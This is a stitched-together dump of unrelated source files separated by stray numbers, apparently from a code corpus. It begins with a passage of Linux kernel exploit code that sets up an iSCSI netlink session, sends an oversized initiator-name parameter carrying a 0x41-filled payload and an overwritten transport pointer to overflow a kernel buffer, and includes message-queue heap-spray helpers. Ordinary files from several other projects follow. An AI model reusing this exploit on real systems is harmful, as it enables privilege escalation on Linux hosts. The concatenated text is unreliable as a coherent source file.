port) { int sock; int err; sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (sock == -1) { perror("socket"); return -1; } memset(si, 0, sizeof(*si)); si->sin_family = AF_INET; si->sin_port = htons(port); err = inet_aton("127.0.0.1", &si->sin_addr); if (err == -1) { perror("inet_aton"); close(sock); return -1; } int sendbuff = 10*409600; setsockopt(sock, SOL_SOCKET, SO_SNDBUF, &sendbuff, sizeof(sendbuff)); sendbuff = 10*409600; setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &sendbuff, sizeof(sendbuff)); return sock; } int client_sendmsg(int sock, struct sockaddr_in *si, char *buf, size_t len) { struct iovec iov; struct msghdr mh; memset(&iov, 0, sizeof(iov)); memset(&mh, 0, sizeof(mh)); iov.iov_base = buf; iov.iov_len = len; mh.msg_name = si; mh.msg_namelen = sizeof(struct sockaddr); mh.msg_iov = &iov; mh.msg_iovlen = 1; mh.msg_control = NULL; mh.msg_controllen = 0; return sendmsg(sock, &mh, 0); } int init_msgq() { return msgget(IPC_PRIVATE, 0644 | IPC_CREAT); } struct msg { long mtype; /* message type, must be > 0 */ char mtext[2 * MSG_SIZE]; /* message data */ }; int msgq_send(int msgq_fd, char *buf, size_t len) { static struct msg m; if(len + sizeof(long) > sizeof(struct msg)) { printf("msgq_send buffer is not large enough for spray data (needs %lu, has %lu)\n", len, sizeof(struct msg)); exit(1); } m.mtype = 1; memcpy(&m.mtext, buf, len); return msgsnd(msgq_fd, &m, len, 0); } int msgq_recv(int msgq_fd) { struct msg m; return msgrcv(msgq_fd, &m, sizeof(m.mtext), 0, MSG_NOERROR); } /////////////////////////////////////////////////////////////////////////////// // Miscellaneous Functions///////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// int bind_cpu() { cpu_set_t set; CPU_ZERO(&set); CPU_SET(0, &set); if(sched_setaffinity(0, sizeof(cpu_set_t), &set) < 0) { printf("Failed to set CPU affinity: errno %d (%s)\n", errno, strerror(errno)); exit(1); } } /////////////////////////////////////////////////////////////////////////////// // Exploit code /////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// int setup_iscsi(int load_only, uint32_t *hostnop, uint32_t *sidp, int *sock_fdp, uint64_t *handlep) { struct sockaddr_nl addr; struct nlmsghdr *nlh = NULL; struct iscsi_uevent * ev; char * buffer, * payload; uint32_t hostno, sid; int i, sock_fd; uint64_t handle = 0; //Try to load the scsi_transport_iscsi and ib_iser modules sock_fd = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_RDMA); if(sock_fd >= 0) close(sock_fd); sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI); if(sock_fd < 0) { printf("Failed to get a NETLINK_ISCSI socket (errno %d: %s)\n", errno, strerror(errno)); return -1; } if(load_only) return 0; buffer = (void *)(nlh = (struct nlmsghdr *)malloc(NLMSG_LENGTH(MSG_SIZE))); if(!buffer) { printf("Failed to get memory for message buffer (errno %d: %s)\n", errno, strerror(errno)); return -1; } //Get the handle of a iscsi transport for(i = 0; handle == 0 && i < 5; i++) { if (iser_transport_handle_exists()) handle = get_iser_transport_handle(); if(handle == 0) { if (i == 0) printf("Waiting for iser_transport file to appear\n"); sleep(1); } } if(handle == 0) { printf("Failed to read an iscsi driver handle\n"); return -1; } printf("Got iscsi iser transport handle 0x%lx\n", handle); //Bind the socket memset(&addr, 0, sizeof(addr)); addr.nl_family = AF_NETLINK; addr.nl_pid = getpid(); bind(sock_fd, (struct sockaddr*)&addr, sizeof(addr)); //Setup the netlink message header memset(nlh, 0, NLMSG_LENGTH(MSG_SIZE)); nlh->nlmsg_len = NLMSG_LENGTH(MSG_SIZE); nlh->nlmsg_pid = getpid(); nlh->nlmsg_flags = NLM_F_REQUEST; nlh->nlmsg_type = ISCSI_UEVENT_CREATE_SESSION; //Send the create session message ev = (struct iscsi_uevent *)NLMSG_DATA(nlh); ev->type = ISCSI_UEVENT_CREATE_SESSION; ev->iferror = 0; ev->transport_handle = handle; send_netlink_msg(sock_fd, nlh); //Read the response to get the sid and hostno read_response(sock_fd, nlh); sid = ev->r.c_session_ret.sid; hostno = ev->r.c_session_ret.host_no; //printf("Success - sid %u - hostno %u\n", sid, hostno); free(buffer); //Save to the output parameters and return *hostnop = hostno; *sidp = sid; *sock_fdp = sock_fd; *handlep = handle; return 0; } int setup_overflow(uint32_t hostno, int sock_fd, uint64_t handle) { struct nlmsghdr *nlh = NULL; struct iscsi_uevent * ev = NULL; char * payload = NULL; nlh = (struct nlmsghdr *)malloc(NLMSG_LENGTH(MSG_SIZE)); if(!nlh) { printf("Failed to get memory for message buffer (errno %d: %s)\n", errno, strerror(errno)); return -1; } //Setup the setting message memset(nlh, 0, NLMSG_LENGTH(4096 + 8 + sizeof(struct iscsi_uevent) + 1)); nlh->nlmsg_len = NLMSG_LENGTH(4096 + 8 + sizeof(struct iscsi_uevent) + 1); nlh->nlmsg_type = ISCSI_UEVENT_SET_HOST_PARAM; //Send the initiator setting message ev = (struct iscsi_uevent *)NLMSG_DATA(nlh); ev->type = ISCSI_UEVENT_SET_HOST_PARAM; ev->iferror = 0; ev->transport_handle = handle; ev->u.set_host_param.host_no = hostno; ev->u.set_host_param.param = ISCSI_HOST_PARAM_INITIATOR_NAME; //ev->u.set_host_param.len = 4096 + 8; //The len parameter isn't used, it uses the string length payload = ((void *)ev) + sizeof(struct iscsi_uevent); memset(payload, 0x41, 4096); *((uint64_t *)(&payload[4096])) = handle + TRANSPORT_STRUCT_OFFSET; payload[4096+8] = 0; send_netlink_msg(sock_fd, nlh); //Read the response to make sure we succeeded read_response(sock_fd, nlh); //printf("Set name successfully\n"); free(nlh); return 0; }
4,273
1,738
/* * All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or * its licensors. * * For complete copyright and license terms please see the LICENSE at the root of this * distribution (the "License"). All use of this software is governed by the License, * or, if provided, by the license below or the license accompanying this file. Do not * remove or modify any license notices. This file is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * */ #include "HMDFramework_precompiled.h" #include <platform_impl.h> #include "HMDDebuggerComponent.h" #include "HMDLuaComponent.h" #ifdef VR_EDITOR #include "EditorVRPreviewComponent.h" #endif // VR_EDITOR #include <IGem.h> #include <AzFramework/Metrics/MetricsPlainTextNameRegistration.h> namespace HMDFramework { class HMDFrameworkModule : public CryHooksModule { public: AZ_RTTI(HMDFrameworkModule, "{57CFF7A2-A9D0-4D30-912E-4564C4DF19D3}", CryHooksModule); HMDFrameworkModule() : CryHooksModule() { // Push results of [MyComponent]::CreateDescriptor() into m_descriptors here. m_descriptors.insert(m_descriptors.end(), { HMDDebuggerComponent::CreateDescriptor(), AZ::VR::HMDLuaComponent::CreateDescriptor(), #ifdef VR_EDITOR AZ::VR::EditorVRPreviewComponent::CreateDescriptor(), #endif //VR_EDITOR }); // This is an internal Amazon gem, so register it's components for metrics tracking, otherwise the name of the component won't get sent back. // IF YOU ARE A THIRDPARTY WRITING A GEM, DO NOT REGISTER YOUR COMPONENTS WITH EditorMetricsComponentRegistrationBus AZStd::vector<AZ::Uuid> typeIds; typeIds.reserve(m_descriptors.size()); for (AZ::ComponentDescriptor* descriptor : m_descriptors) { typeIds.emplace_back(descriptor->GetUuid()); } EBUS_EVENT(AzFramework::MetricsPlainTextNameRegistrationBus, RegisterForNameSending, typeIds); } /** * Add required SystemComponents to the SystemEntity. */ AZ::ComponentTypeList GetRequiredSystemComponents() const override { return AZ::ComponentTypeList { azrtti_typeid<HMDDebuggerComponent>(), azrtti_typeid<AZ::VR::HMDLuaComponent>(), }; } }; } // DO NOT MODIFY THIS LINE UNLESS YOU RENAME THE GEM // The first parameter should be GemName_GemIdLower // The second should be the fully qualified name of the class above AZ_DECLARE_MODULE_CLASS(HMDFramework_24a3427048184feba39ba2cf75d45c4c, HMDFramework::HMDFrameworkModule)
1,138
1,144
<filename>backend/de.metas.ui.web.base/src/main/java/de/metas/ui/web/order/sales/purchasePlanning/process/PurchaseViewBasedProcess.java package de.metas.ui.web.order.sales.purchasePlanning.process; import de.metas.process.IProcessPrecondition; import de.metas.ui.web.order.sales.purchasePlanning.view.PurchaseRowChangeRequest; import de.metas.ui.web.order.sales.purchasePlanning.view.PurchaseRowId; import de.metas.ui.web.order.sales.purchasePlanning.view.PurchaseView; import de.metas.ui.web.process.adprocess.ViewBasedProcessTemplate; /* * #%L * metasfresh-webui-api * %% * Copyright (C) 2018 metas GmbH * %% * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as * published by the Free Software Foundation, either version 2 of the * License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public * License along with this program. If not, see * <http://www.gnu.org/licenses/gpl-2.0.html>. * #L% */ public abstract class PurchaseViewBasedProcess extends ViewBasedProcessTemplate implements IProcessPrecondition { @Override protected final PurchaseView getView() { return PurchaseView.cast(super.getView()); } protected final void patchViewRow(final PurchaseRowId rowId, final PurchaseRowChangeRequest rowChangeRequest) { getView().patchViewRow(rowId, rowChangeRequest); } }
517
609
package org.consenlabs.tokencore.testutils; import org.consenlabs.tokencore.wallet.KeystoreStorage; import java.io.File; /** * Created by xyz on 2018/4/8. */ public class LocalFileStorage implements KeystoreStorage { @Override public File getKeystoreDir() { return new File("/tmp/imtoken"); } }
106
1,408
/* * Copyright (c) 2019-2020, Broadcom * * SPDX-License-Identifier: BSD-3-Clause */ #ifndef BOARD_FAMILY_H #define BOARD_FAMILY_H #if defined(DRIVER_SPD_ENABLE) && !defined(DRIVER_SPD_SPOOF) #include <spd.h> #endif #ifdef USE_GPIO /* max number of supported GPIOs to construct the bitmap for board detection */ #define MAX_NR_GPIOS 4 /* max GPIO bitmap value */ #define MAX_GPIO_BITMAP_VAL (BIT(MAX_NR_GPIOS) - 1) #endif struct mcb_ref_group { uint32_t mcb_ref; unsigned int *mcb_cfg; }; #define MCB_REF_GROUP(ref) \ { \ .mcb_ref = 0x ## ref, \ .mcb_cfg = mcb_ ## ref, \ } #endif
286
3,227
<filename>BGL/include/CGAL/boost/graph/IO/Generic_facegraph_builder.h // Copyright (c) 2019 GeometryFactory // // This file is part of CGAL (www.cgal.org); // // $URL$ // $Id$ // SPDX-License-Identifier: LGPL-3.0-or-later OR LicenseRef-Commercial // // Author(s) : <NAME> // <NAME> #ifndef CGAL_BGL_IO_GENERIC_FACEGRAPH_BUILDER_H #define CGAL_BGL_IO_GENERIC_FACEGRAPH_BUILDER_H #include <CGAL/boost/graph/Euler_operations.h> #include <CGAL/boost/graph/named_params_helper.h> #include <iostream> #include <string> #include <vector> namespace CGAL{ namespace IO { namespace internal { template <typename Graph, typename Point, typename Derived> class Generic_facegraph_builder { protected: typedef std::vector<Point> Point_container; typedef typename Point_container::size_type size_type; typedef std::vector<std::size_t> Face; typedef std::vector<Face> Face_container; typedef typename boost::graph_traits<Graph>::vertex_descriptor vertex_descriptor; typedef typename boost::graph_traits<Graph>::face_descriptor face_descriptor; public: Generic_facegraph_builder(std::istream& in_) : m_is(in_) { } template <typename NamedParameters> bool operator()(Graph& g, const NamedParameters& np) { typedef typename GetK<Graph, NamedParameters>::Kernel Kernel; typedef typename Kernel::Vector_3 Vector; typedef typename Kernel::Point_2 Texture; typedef CGAL::IO::Color Color; typedef typename CGAL::GetVertexPointMap<Graph, NamedParameters>::type VPM; // usually will be true, but might not be the case if using custom type points // CGAL_static_assertion((std::is_same<typename Kernel::Point_3, // typename boost::property_traits<VPM>::value_type>::value)); // CGAL_static_assertion((std::is_same<typename Kernel::Point_3, // typename boost::range_value<Point_container>::type>::value)); typedef typename internal_np::Lookup_named_param_def< internal_np::vertex_normal_map_t, NamedParameters, Constant_property_map<vertex_descriptor, Vector> >::type VNM; typedef typename internal_np::Lookup_named_param_def< internal_np::vertex_color_map_t, NamedParameters, Constant_property_map<vertex_descriptor, Color> >::type VCM; typedef typename internal_np::Lookup_named_param_def< internal_np::vertex_texture_map_t, NamedParameters, Constant_property_map<vertex_descriptor, Texture> >::type VTM; typedef typename internal_np::Lookup_named_param_def< internal_np::face_color_map_t, NamedParameters, Constant_property_map<face_descriptor, Color> >::type FCM; typedef typename boost::property_traits<VNM>::value_type Vertex_normal; typedef typename boost::property_traits<VCM>::value_type Vertex_color; typedef typename boost::property_traits<VTM>::value_type Vertex_texture; typedef typename boost::property_traits<FCM>::value_type Face_color; using parameters::choose_parameter; using parameters::is_default_parameter; using parameters::get_parameter; const bool is_vnm_requested = !(is_default_parameter(get_parameter(np, internal_np::vertex_normal_map))); const bool is_vcm_requested = !(is_default_parameter(get_parameter(np, internal_np::vertex_color_map))); const bool is_vtm_requested = !(is_default_parameter(get_parameter(np, internal_np::vertex_texture_map))); const bool is_fcm_requested = !(is_default_parameter(get_parameter(np, internal_np::face_color_map))); std::vector<Vertex_normal> vertex_normals; std::vector<Vertex_color> vertex_colors; std::vector<Vertex_texture> vertex_textures; std::vector<Face_color> face_colors; const bool verbose = choose_parameter(get_parameter(np, internal_np::verbose), false); const bool binary = choose_parameter(get_parameter(np, internal_np::use_binary_mode), true); bool ok = static_cast<Derived*>(this)->read(m_is, m_points, m_faces, parameters::vertex_normal_output_iterator(std::back_inserter(vertex_normals)) .vertex_color_output_iterator(std::back_inserter(vertex_colors)) .vertex_texture_output_iterator(std::back_inserter(vertex_textures)) .face_color_output_iterator(std::back_inserter(face_colors)) .verbose(verbose) .use_binary_mode(binary)); if(!ok) return false; // Construct the graph VPM vpm = choose_parameter(get_parameter(np, internal_np::vertex_point), get_property_map(CGAL::vertex_point, g)); VNM vnm = choose_parameter(get_parameter(np, internal_np::vertex_normal_map), VNM()); VCM vcm = choose_parameter(get_parameter(np, internal_np::vertex_color_map), VCM()); VTM vtm = choose_parameter(get_parameter(np, internal_np::vertex_texture_map), VTM()); FCM fcm = choose_parameter(get_parameter(np, internal_np::face_color_map), FCM()); const bool has_vertex_normals = (is_vnm_requested && !(vertex_normals.empty())); const bool has_vertex_colors = (is_vcm_requested && !(vertex_colors.empty())); const bool has_vertex_textures = (is_vtm_requested && !(vertex_textures.empty())); const bool has_face_colors = (is_fcm_requested && !(face_colors.empty())); if(has_vertex_normals && vertex_normals.size() != m_points.size()) return false; if(has_vertex_colors && vertex_colors.size() != m_points.size()) return false; if(has_vertex_textures && vertex_textures.size() != m_points.size()) return false; if(has_face_colors && face_colors.size() != m_faces.size()) return false; std::vector<vertex_descriptor> vertices(m_points.size()); for(std::size_t id=0, ps=m_points.size(); id<ps; ++id) { vertices[id] = add_vertex(g); put(vpm, vertices[id], m_points[id]); // extra properties if(has_vertex_normals) put(vnm, vertices[id], vertex_normals[id]); if(has_vertex_colors) put(vcm, vertices[id], vertex_colors[id]); if(has_vertex_textures) put(vtm, vertices[id], vertex_textures[id]); } for(size_type i=0, fs=m_faces.size(); i<fs; ++i) { std::vector<vertex_descriptor> face(m_faces[i].size()); for(std::size_t j=0, fis=face.size(); j<fis; ++j) face[j] = vertices[m_faces[i][j]]; face_descriptor f = CGAL::Euler::add_face(face, g); if(f == boost::graph_traits<Graph>::null_face()) return false; if(has_face_colors) put(fcm, f, face_colors[i]); } return is_valid(g); } bool operator()(Graph& g) { return operator()(g, parameters::all_default()); } protected: std::istream& m_is; Point_container m_points; Face_container m_faces; }; } // namespace internal } // namespace IO } // namespace CGAL #endif // CGAL_BGL_IO_GENERIC_FACEGRAPH_BUILDER_H
3,666
713
package org.infinispan.client.rest.impl.okhttp.auth; import java.io.IOException; import okhttp3.Authenticator; import okhttp3.HttpUrl; import okhttp3.Request; import okhttp3.Route; public interface CachingAuthenticator extends Authenticator { Request authenticateWithState(Route route, Request request) throws IOException; static String getCachingKey(Request request) { final HttpUrl url = request.url(); if (url == null) return null; return url.scheme() + ":" + url.host() + ":" + url.port(); } }
183
3,139
<gh_stars>1000+ /* * Copyright (c) 2009-2021 jMonkeyEngine * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * * Neither the name of 'jMonkeyEngine' nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ package jme3test.post; import com.jme3.app.SimpleApplication; import com.jme3.input.KeyInput; import com.jme3.input.controls.ActionListener; import com.jme3.input.controls.KeyTrigger; import com.jme3.light.DirectionalLight; import com.jme3.material.Material; import com.jme3.math.*; import com.jme3.post.FilterPostProcessor; import com.jme3.post.filters.*; import com.jme3.renderer.Caps; import com.jme3.renderer.queue.RenderQueue.ShadowMode; import com.jme3.scene.Geometry; import com.jme3.scene.Spatial; import com.jme3.scene.shape.Box; import com.jme3.texture.Texture; import com.jme3.util.SkyFactory; import com.jme3.util.SkyFactory.EnvMapType; import com.jme3.util.TangentBinormalGenerator; public class TestPostFilters extends SimpleApplication implements ActionListener { private FilterPostProcessor fpp; final private Vector3f lightDir = new Vector3f(-1, -1, .5f).normalizeLocal(); private FadeFilter fade; public static void main(String[] args) { TestPostFilters app = new TestPostFilters(); // AppSettings settings = new AppSettings(true); // settings.setRenderer(AppSettings.LWJGL_OPENGL2); // app.setSettings(settings); app.start(); } public void setupFilters() { if (renderer.getCaps().contains(Caps.GLSL100)) { fpp = new FilterPostProcessor(assetManager); // fpp.setNumSamples(4); // fpp.setNumSamples(4); //fpp.addFilter(new ColorOverlayFilter(ColorRGBA.LightGray)); fpp.addFilter(new RadialBlurFilter()); fade = new FadeFilter(1.0f); fpp.addFilter(fade); viewPort.addProcessor(fpp); } } public void setupSkyBox() { Texture envMap; if (renderer.getCaps().contains(Caps.FloatTexture)) { envMap = assetManager.loadTexture("Textures/Sky/St Peters/StPeters.hdr"); } else { envMap = assetManager.loadTexture("Textures/Sky/St Peters/StPeters.jpg"); } Spatial sky = SkyFactory.createSky(assetManager, envMap, new Vector3f(-1f, -1f, -1f), EnvMapType.SphereMap); rootNode.attachChild(sky); } public void setupLighting() { DirectionalLight dl = new DirectionalLight(); dl.setDirection(lightDir); dl.setColor(new ColorRGBA(.9f, .9f, .9f, 1)); rootNode.addLight(dl); dl = new DirectionalLight(); dl.setDirection(new Vector3f(1, 0, -1).normalizeLocal()); dl.setColor(new ColorRGBA(.4f, .4f, .4f, 1)); // rootNode.addLight(dl); } public void setupFloor() { Material mat = assetManager.loadMaterial("Textures/Terrain/BrickWall/BrickWall.j3m"); Box floor = new Box(50, 1f, 50); TangentBinormalGenerator.generate(floor); floor.scaleTextureCoordinates(new Vector2f(5, 5)); Geometry floorGeom = new Geometry("Floor", floor); floorGeom.setMaterial(mat); floorGeom.setShadowMode(ShadowMode.Receive); rootNode.attachChild(floorGeom); } public void setupSignpost() { Spatial signpost = assetManager.loadModel("Models/Sign Post/Sign Post.mesh.xml"); Material mat = assetManager.loadMaterial("Models/Sign Post/Sign Post.j3m"); signpost.setMaterial(mat); signpost.rotate(0, FastMath.HALF_PI, 0); signpost.setLocalTranslation(12, 3.5f, 30); signpost.setLocalScale(4); signpost.setShadowMode(ShadowMode.CastAndReceive); rootNode.attachChild(signpost); } @Override public void simpleInitApp() { cam.setLocation(new Vector3f(-32.295086f, 54.80136f, 79.59805f)); cam.setRotation(new Quaternion(0.074364014f, 0.92519957f, -0.24794696f, 0.27748522f)); setupLighting(); setupSkyBox(); setupFloor(); setupSignpost(); setupFilters(); initInput(); } protected void initInput() { flyCam.setMoveSpeed(50); //init input inputManager.addMapping("fadein", new KeyTrigger(KeyInput.KEY_I)); inputManager.addListener(this, "fadein"); inputManager.addMapping("fadeout", new KeyTrigger(KeyInput.KEY_O)); inputManager.addListener(this, "fadeout"); } @Override public void onAction(String name, boolean value, float tpf) { if (name.equals("fadein") && value) { fade.fadeIn(); System.out.println("fade in"); } if (name.equals("fadeout") && value) { fade.fadeOut(); System.out.println("fade out"); } } }
2,481
10,225
package io.quarkus.cache.runtime; import javax.annotation.Priority; import javax.interceptor.AroundInvoke; import javax.interceptor.Interceptor; import javax.interceptor.InvocationContext; import org.jboss.logging.Logger; import io.quarkus.cache.CacheInvalidateAll; @CacheInvalidateAll(cacheName = "") // The `cacheName` attribute is @Nonbinding. @Interceptor @Priority(CacheInterceptor.BASE_PRIORITY) public class CacheInvalidateAllInterceptor extends CacheInterceptor { private static final Logger LOGGER = Logger.getLogger(CacheInvalidateAllInterceptor.class); private static final String INTERCEPTOR_BINDINGS_ERROR_MSG = "The Quarkus cache extension is not working properly (CacheInvalidateAll interceptor bindings retrieval failed), please create a GitHub issue in the Quarkus repository to help the maintainers fix this bug"; @AroundInvoke public Object intercept(InvocationContext invocationContext) throws Exception { CacheInterceptionContext<CacheInvalidateAll> interceptionContext = getInterceptionContext(invocationContext, CacheInvalidateAll.class, false); if (interceptionContext.getInterceptorBindings().isEmpty()) { // This should never happen. LOGGER.warn(INTERCEPTOR_BINDINGS_ERROR_MSG); } else { for (CacheInvalidateAll binding : interceptionContext.getInterceptorBindings()) { AbstractCache cache = (AbstractCache) cacheManager.getCache(binding.cacheName()).get(); if (LOGGER.isDebugEnabled()) { LOGGER.debugf("Invalidating all entries from cache [%s]", binding.cacheName()); } cache.invalidateAll(); } } return invocationContext.proceed(); } }
626
1,273
package org.broadinstitute.hellbender.utils.read; import htsjdk.samtools.Cigar; import htsjdk.samtools.CigarElement; import htsjdk.samtools.CigarOperator; import org.broadinstitute.hellbender.utils.Utils; import org.broadinstitute.hellbender.utils.param.ParamUtils; import org.testng.Assert; import org.testng.annotations.Test; import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.Random; /** * Utilities for unit-testing cigars. */ public final class CigarTestUtils { @Test public static void testRandomValidCigarsAreValid() { final List<Cigar> randomCigars = randomValidCigars(new Random(113), 1_000, 5, 50); for (final Cigar cigar : randomCigars) { Assert.assertNotNull(cigar); Assert.assertNull(cigar.isValid("read-name", 0)); } } /** * Returns a list of randomly generted valid CIGAR instances. * @param rdn random number generator to use to generate random elements in the result cigars. * @param count number of random cigars to produce. * @param maximumNumberOfCoreElements maximum number of core (anything except clipping) operations in any given cigar. * @param maximumElementLength maximum length for any cigar element. * @param prepend additional cigar to be added a the beginning of the result list. * @return never {@code null}. */ public static List<Cigar> randomValidCigars(final Random rdn, final int count, final int maximumNumberOfCoreElements, final int maximumElementLength, final Cigar ... prepend) { Utils.nonNull(rdn); ParamUtils.isPositiveOrZero(count, "number of cigars"); Utils.nonNull(prepend); final List<Cigar> result = new ArrayList<>(prepend.length + count); for (final Cigar cigar : prepend) { result.add(cigar); } for (int i = 0; i < count; i++) { final boolean leftClipping = rdn.nextBoolean(); final boolean rightClipping = rdn.nextBoolean(); final boolean leftHardClipping = leftClipping && rdn.nextBoolean(); final boolean rightHardClipping = rightClipping && rdn.nextBoolean(); final int leftClippingLength = leftClipping ? rdn.nextInt(maximumElementLength) + 1 : 0; final int rightClippingLength = rightClipping ? rdn.nextInt(maximumElementLength) + 1: 0; final int leftHardClippingLength = leftHardClipping ? (rdn.nextBoolean() ? leftClippingLength : rdn.nextInt(leftClippingLength) + 1) : 0; final int rightHardClippingLength = rightHardClipping ? (rdn.nextBoolean() ? rightClippingLength : rdn.nextInt(rightClippingLength + 1) ): 0; final int leftSoftClippingLength = leftClippingLength - leftHardClippingLength; final int rightSoftClippingLength = rightClippingLength - rightHardClippingLength; final List<CigarElement> coreElements = new ArrayList<>(); final int coreElementCount = rdn.nextInt(maximumNumberOfCoreElements + 1); coreElements.add(new CigarElement(rdn.nextInt(maximumElementLength) + 1, CigarOperator.M)); for (int j = 0; j < coreElementCount; j++) { final CigarOperator op = randomCoreOperator(rdn); coreElements.add(new CigarElement(rdn.nextInt(maximumElementLength) + 1, op)); } Collections.shuffle(coreElements, rdn); if (!coreElements.get(0).getOperator().isAlignment()) { coreElements.add(0, new CigarElement(rdn.nextInt(maximumElementLength) + 1, CigarOperator.M)); } if (!coreElements.get(coreElements.size() - 1).getOperator().isAlignment()) { coreElements.add(new CigarElement(rdn.nextInt(maximumElementLength) + 1, CigarOperator.M)); } final CigarBuilder elements = new CigarBuilder(); if (leftHardClippingLength > 0) elements.add(new CigarElement(leftHardClippingLength, CigarOperator.H)); if (leftSoftClippingLength > 0) elements.add(new CigarElement(leftSoftClippingLength, CigarOperator.S)); elements.addAll(coreElements); if (rightSoftClippingLength > 0) elements.add(new CigarElement(rightSoftClippingLength, CigarOperator.S)); if (rightHardClippingLength > 0) elements.add(new CigarElement(rightHardClippingLength, CigarOperator.H)); result.add(elements.make()); } return result; } private static CigarOperator randomCoreOperator(final Random rdn) { while (true) { final int idx = rdn.nextInt(CigarOperator.values().length); final CigarOperator op = CigarOperator.values()[idx]; if (!op.isClipping()) { return op; } } } }
1,962
701
#include <bvm/obj/obj.h> BvmObj *bvm_obj_create(size_t size, BvmObj *proto, Alloc *alloc) { size_t alloc_size = sizeof(BvmObj) + size * sizeof(BvmVal); BvmObj *self = alloc_malloc(alloc, alloc_size); self->proto = proto; self->len = proto->len; return self; } BvmVal bvm_obj_load(BvmObj *self, size_t index) { if (index >= self->len) { return bvm_val_undef(); } return self->vals[index]; } BvmVal bvm_obj_loadv(BvmObj *self, size_t index) { if (!self) { return bvm_val_undef(); } if (index >= self->len) { return bvm_val_undef(); } if (self->vals[index].type != BVM_UNDEF) { return self->vals[index]; } return bvm_obj_loadv(self->proto, index); } void bvm_obj_store(BvmObj *self, size_t index, BvmVal data) { if (index >= self->len) { return; } self->vals[index] = data; } void bvm_obj_storev(BvmObj *self, size_t index, BvmVal data) { if (!self) { return; } if (index >= self->len) { return; } if (self->vals[index].type != BVM_UNDEF) { self->vals[index] = data; } bvm_obj_storev(self->proto, index, data); } bool bvm_obj_isa(BvmObj *self, BvmObj *proto) { if (!self) { return false; } if (self->proto == proto) { return true; } return bvm_obj_isa(self->proto, proto); }
711
419
"""Small snippet to raise an IndexError.""" def index_error(): lst = list('foobar') print lst[len(lst)] if __name__ == '__main__': index_error()
63